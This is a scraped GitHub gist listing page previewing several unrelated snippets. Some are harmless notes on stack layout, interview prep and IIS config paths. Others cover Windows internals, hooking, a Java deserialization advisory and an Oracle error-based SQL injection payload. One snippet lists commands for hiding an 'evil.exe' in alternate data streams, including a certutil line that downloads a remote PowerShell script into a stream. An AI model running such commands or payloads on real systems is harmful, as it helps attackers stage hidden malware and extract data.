Skip to content

Instantly share code, notes, and snippets.

View Margaruga's full-sized avatar
👋

Marcos Diaz Margaruga

👋
26 followers · 27 following
View GitHub Profile
@cpq
cpq / Stack.md
Last active January 14, 2025 15:58
Why stack grows down

Why stack grows down

Any running process has several memory regions: code, read-only data, read-write data, et cetera. Some regions, such as code and read-only data, are static and do not change over time. Other regions are dynamic: they can expand and shrink. Usually there are two such regions: dynamic read-write data region, called heap, and a region called stack. Heap holds dynamic memory allocations, and stack is mostly used for keeping function frames.

Both stack and heap can grow. An OS doesn't know in advance whether stack or heap will be used predominantly. Therefore, an OS must layout these two memory regions in a way to guarantee maximum space for both. And here is the solution:

  1. Layout static memory regions at the edges of process's virtual memory
  2. Put heap and stack on edges too, and let them grow towards each other: one grows up, one grows down
@tsiege
tsiege / The Technical Interview Cheat Sheet.md
Last active March 1, 2025 00:22
This is my technical interview cheat sheet. Feel free to fork it or do whatever you want with it. PLEASE let me know if there are any errors or if anything crucial is missing. I will add more links soon.

ANNOUNCEMENT

I have moved this over to the Tech Interview Cheat Sheet Repo and has been expanded and even has code challenges you can run and practice against!






\

@Spl3en
Spl3en / ModulesFromPeb.c
Created May 9, 2015 10:09
Get current process modules from PEB
#include <windows.h>
#include <subauth.h>
#include <stdio.h>
/* Windows structures */
typedef struct _PEB_LDR_DATA {
BYTE Reserved1[8];
PVOID Reserved2[3];
LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
@frohoff
frohoff / JAVA-ADVISORY.md
Last active August 28, 2023 19:08
Java 7u21 Security Advisory

Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management

Introduction

  • Affected Product(s): Java SE 6, Java SE 7
  • Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
  • Vendor Contact: [email protected]
  • Vulnerability Type: Unsafe Object Deserialization
@NaxAlpha
NaxAlpha / HookFx.cs
Last active October 24, 2024 12:53
Windows API Hook with C#
using System;
using System.Runtime.InteropServices;
public class FxHook:IDisposable {
const int nBytes = 5;
IntPtr addr;
Protection old;
byte[] src = new byte[5];
@wbenny
wbenny / nt_syscalls.md
Last active September 16, 2024 22:11
Windows syscall stubs

Windows system calls

...by stub

x86

Windows XP

B8 ?? ?? ?? ??                mov     eax, ??
BA 00 03 FE 7F                mov     edx, 7FFE0300h
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active February 25, 2025 08:33
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@xassiz
xassiz / oracle_error-based_xmltype.sql
Created April 17, 2018 18:29
Optimized Oracle error-based SQL injection technique via xmltype() + base64
/*
* @description: Optimized Oracle error-based SQLi via xmltype() + base64 (up to 162 bytes/req)
* @author: xassiz
*/
select ''||
xmltype('<'||
regexp_replace(
utl_raw.cast_to_varchar2(
utl_encode.base64_encode(
@NaniteFactory
NaniteFactory / dllmain.go
Last active February 21, 2025 23:33
An implementation example of DllMain() entrypoint with Golang. $ go build --buildmode=c-shared -o my.dll && rundll32.exe my.dll Test
package main
//#include "dllmain.h"
import "C"
@jonlabelle
jonlabelle / iis_config_file_paths.md
Created March 21, 2019 15:49
IIS Config File Paths

IIS Config File Paths

Internet Information Services (IIS) 7 and later use an XML-based configuration system for storing IIS settings which replaces the metabase that was used in IIS 6.0 and earlier. This new configuration system was introduced with ASP.NET and is based on a hierarchical system of management system that uses *.config files. The configuration files for IIS 7 and later are located in the %windir%\System32\inetsrv\config folder.

applicationHost.config